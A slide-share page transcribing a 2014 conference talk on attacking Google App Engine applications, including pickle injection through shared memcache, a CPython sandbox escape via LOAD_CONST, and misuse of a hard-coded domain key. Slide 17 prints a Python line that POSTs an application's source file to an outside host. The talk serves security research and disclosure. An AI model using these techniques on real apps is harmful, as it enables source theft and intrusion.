NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
 
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NSC #2 - D2 05 - Andrea Barisani - Forging the USB ArmoryNSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
 
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database AttacksNSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
 
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
 
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
 
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practiceNSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
 
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLCNSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
 
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my QNSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
 
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineeringNSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
 

Recently uploaded

Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024The Digital Insurer
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusZilliz
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...apidays
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 

Recently uploaded (20)

Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 

NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security

  • 1. Presented 20/11/2014 For NoSuchCon 2014 By Nicolas Collignon Google Apps Engine G-Jacking AppEngine-based applications
  • 2.  Introduction to GAE  G-Jacking – The code – The infrastructure – The sandbox  Conclusion
  • 4. 4 / 39 What is GAE?  A Platform-As-A-Service for Web applications – SDK provided to develop, test and deploy GAE applications – services and back-ends are hosted in Google datacenters – Data can be hosted in Europe after filling the Extended European Offering form  Supported programming languages:
  • 5. Overview of the architecture  A « load-balancer + reverse-proxy + application server + backends » solution – IPv4 and IPv6 – HTTP, HTTPS, SPDY/3, SPDY/3.1, SPDY/4a4 and QUIC unified as FastCGI – Can be connected with HTTP services within an internal network via Google SDC
  • 6. Attacking the app implementation
  • 7. Developers still...  ... manipulate raw SQL queries – MySQL injections still happen in Google Cloud SQL – GQL injections seem more rare  ... control raw HTTP responses – XSS still happen (even in GAE samples code...)  ... need to implement security features and/or correctly use frameworks – CSRF / XXE – Direct ID references
  • 8. The urlfetch API  Requesting external Web services – SSL certificates validation is not enabled by default – Developers may (forget to) use the check_certificate=True argument  Requesting GAE Web services – Google provides trusted (not spoofable) HTTP headers such as X-Appengine-Inbound-Appid or X-Appengine-Cron – but many applications extract the caller identity by using the User-Agent header AppEngine-Google; (+http://code.google.com/appengine; appid: APP_ID)
  • 9. Other APIs  Socket with SSL – Need to use CERT_REQUIRED and match_hostname  Channel – XSS may help to steal the token generated by create_channel in order to intercept channel messages  Task Queues – Push queues workers URLs handlers must be restricted to admin roles
  • 10. Python RCE  How to obtain arbitrary Python code execution? – A Google account that manage the app. is compromised – By exploiting eval/unserialize/pickle vulnerabilities  Pentesters want persistent shells – Install or inject a XMPP end-point and register an URL route
  • 11. set payload gae/py_bind_gtalk  Directly interact with the application core components
  • 12. GSOD: Google Screen Of Death  DoS attacks turn into over-billing attacks – Most API are billed on a share-basis : CPU, Memory, storage and network services I/O – Daily or per-minute quotas can be setup  IP blacklisting is supported – Blacklisted IP list is maintained by the customer – applications are also exposed on IPv6 and efficiently blacklisting IPv6 networks is hard
  • 13. Attacking the GAE infrastructure
  • 14. Replicating Google @ home  Why all developments cannot be done off-line? – GAE SDK testing tools cannot replicate all available services – It costs money to deploy tests mails/files/databases/etc. servers – Some bugs will trigger only when the application is deployed in Google datacenter: urlfetch API, authorization, SDC, quota handling  What we see: Developers access sensitive credentials – Developers can compromise more services than just the one needed for their needs – Authentication tokens expires but can be renewed – Having a distinct test Google App domain can enforce data isolation
  • 15. Use case: the provisioning API  An application uses the GAE Provisioning API – Mostly used by large organizations that need to automate users management tasks – Sensitive API which requires a secret domain key  Classic fail: production domain key is stored in an insecure place – Google User management cannot be replicated in-house so the primary domain key ends up hard-coded in the application source code – Accessing the domain key is as dangerous as compromising a Windows domain administrator account  Cool pentesting post-exploitation tricks – Perform OAuth impersonations using the domain key to spoof accounts identity – Crawl Tera bytes of consumers data in few seconds with the power of Google services
  • 16. An environment is not a version  Non-GAE applications: what we are used to see – Development and production environments are isolated and have different security levels – Only 1 version of the application is running in production  GAE applications: what we often see – Multiple versions with and without debug features of the same application are running concurrently on the same Google Apps account – We can attack the version “secure” PROD-V2 via vulnerabilities in “insecure” PROD-V1 or DEV-V3
  • 17. Use case: getting the source code  Isolation between versions is possible but often not implemented – Blobstore, Datastore, memcache and tasks queues are shared unless the application uses the Namespaces API  Most GAE applications trust data stored in the memcache back-end – Pickle is often used explicitly or implicitly through sessions management libraries – Evil versions can easily replace trusted data with a malicious Python exploit – The “irreversible” download source kill-switch can be bypassed __import__("google.appengine.api.urlfetch") .appengine.api.urlfetch.fetch(url="http://pouet.synacktiv.fr/", payload=open(__import__("os").environ["PATH_TRANSLATED"].rpartition("/") [2][:-1]).read(), method="POST")
  • 18. SDC: hard-coded credentials  When GAE applications are exposed to 3rd parties – Need to authenticate both Google accounts and another kind of app-specific accounts – The SDC agent only accepts requests from connections authenticated with Google accounts – Developers need to hard-code some Google account credentials when dealing with requests coming from non-Google accounts GAE Application Google account Standard account internal application SDC channel Hard-coded Google account
  • 19. SDC: bypassing internal filtering  SDC agent white-list features – App-Id filtering: it is not used once many GAE applications use the SDC agent – URL filtering: it is not used because each URL Web services must be defined in the configuration GAE Application evil application Same Google App domain 1 SDC channel Deploy app. 2 Corporate network Contact firewalled server
  • 20. The GAE Python sandbox: “Global overview”
  • 21.
  • 22.
  • 23.
  • 24.
  • 25. Attacking the GAE Python sandbox: “Development environment”
  • 26. Restricted API forgotten references  open() function is restricted when the GAE server is bootstrapped
  • 27. Restricted API forgotten references  But a reference to “open” is kept in GAE context
  • 28. Attacking misplaced hooks  Python module os is restricted – Forbid commands execution – it's a wrapper for the unrestricted module posix
  • 29. Attacking the GAE Python sandbox: “@ google datacenter”
  • 30. The LOAD_CONST opcode  pushes co_consts[index] onto the stack – index is not checked against co_names tuple bounds if DEBUG mode is disabled – useful optimization feature :)  GAE applications can create or modify code objects – The Google Python VM is not compiled with DEBUG mode – We can ask the VM to load a Python object from a tuple with an unverified index /* Macro, trading safety for speed */ #define PyTuple_GET_ITEM(op, i) (((PyTupleObject*)(op))->ob_item[i]) case LOAD_CONST: x = GETITEM(consts, oparg); Py_INCREF(x); PUSH(x);
  • 31. Calculate the tuple index  Have LOAD_CONST returns an arbitrary pointer – id() returns the base address of an object – We can fill the VM memory with arbitrary data  index = ( id(evil_obj) - id(tuple_obj) - head_size ) / pointer_size – We can compute the tuple index in order to reference an arbitrary memory area co_consts tuple ( , … ), id(tuple_obj) arbitrary datahead PyObject * PyObject * junk... id(tuple_obj) + head_size id(evil_obj)
  • 32. bytearray object is helpful  bytearray object exposes r/w access to memory – If we control the bounds of the mapped area if can r/w everywhere in memory – The vtable pointer used in object headers can be guessed – We use a innocent string object as a container for an evil bytearray PyStringObject pointer to arbitrary r/w memory id(bytearray) head string data PyByteArrayObject var_head head buffer pointer buffer size VAR_HEAD refs count vtable pointer
  • 33. Back to LOAD_CONST  Packing everything: bytearray + tuple index + LOAD_CONST – We need 2 containers: 1 for the bytearray and 1 for the pointer to bytearray – We run LOAD_CONST + RETURN_VALUE bytecodes that returns a bytearray than can r/w arbitrary memory – If we try to access an unmapped addresses, the Python VM crashes  From arbitrary r/w to arbitrary code execution – We can patch Python objects methods pointers → we can call arbitrary address (control $rip) – We can patch Python VM .plt section → we can safely call arbitrary libc symbol co_consts tuple ( , … ),PyObject * container #1 ByteArrayPyObject * container #2 pointer tuple index adjusted to go here Python VM fseek(A,B,C) Python code file('...').seek(A,B,C) Python .plt XYZ(A,B,C) mmap()+ copy + mprotect()+ call
  • 34. Black-box pentesting is fun  Exploit reliable with many cpython versions but not where we want – arbitrary r/w to memory works @ google but... – Native Client → no mmap + mprotect → no shellcode
  • 35. Exploiting @ google  Still having fun under the NaCl sandbox layer – Use the bytearray r/w exploit to recover libc symbols used by the VM – Use pattern matching and heuristics to locate NaCl ELF loader context – Recover all sandboxed GAE hosting implementation PyTypeObject pointers guessed with id() CPython .data .text .plt / .got method pointers disassembly libc .text xrefs symbols disassembly heuristics
  • 36. Fun @ google  Ok ok … no shellcode but g-john – native CPU perf with __sha512_crypt_r ...  Understand GAE implementation – C++ class appengine, apphosting, udrpc, speckle
  • 38. Final words...  Google security is implemented in depth – Python sandbox can be evaded but it's only the first security layer – The SDK sandbox has no NaCl security layer  Pentesting GAE environments – Classic Web attacks work because developers always need to code “securely” – Getting access to 1 GAE application source code or developer's workstation may lead to the compromise of several services used by one domain – An insecure SDC agent setup may help to bypass internal network firewalls  The GAE framework is complex – It's not easy to migrate to GAE authentication and authorization models – Sensitive credentials are often hard-coded in the wrong places
  • 39. THANKS FOR YOUR ATTENTION. ANY QUESTIONS ?